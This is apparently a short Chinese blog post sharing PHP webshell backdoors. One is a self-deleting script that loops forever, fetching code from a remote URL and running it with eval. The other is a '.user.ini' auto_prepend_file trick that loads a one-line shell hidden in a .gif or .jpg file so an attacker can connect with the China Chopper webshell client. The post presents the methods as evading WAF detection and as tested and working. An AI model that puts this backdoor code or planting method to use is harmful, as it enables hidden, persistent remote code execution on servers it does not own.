过狗一句话超强隐藏

unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>

txt文本: file_put_contents('./1.php',"");
参考链接:捡了一个非常淫荡的PHP后门,给跪了

user.ini后门,需要安装fpm(fastcgi的一种)或fastcgi,实测可用

1、需要必须是(.user.ini);内容:auto_prepend_file=1.gif  其他可用注释符(;)而非(‘#’ 已弃用)
2、1.gif  内容:一句话()还可以是jpg;不可以是png
3、和正常PHP文件(随意)     
注:.user.ini必须和正常的PHP文件是同一目录,才能连菜刀,这个PHP文件即菜刀URL中的PHP文件

注意一个问题:我写的,链接
利用PHP的.user.ini设置文件建造后门

菜刀url中不能使用 /.../ 类似上级目录法(好像本身就有问题哈,嘿嘿)

你可能感兴趣的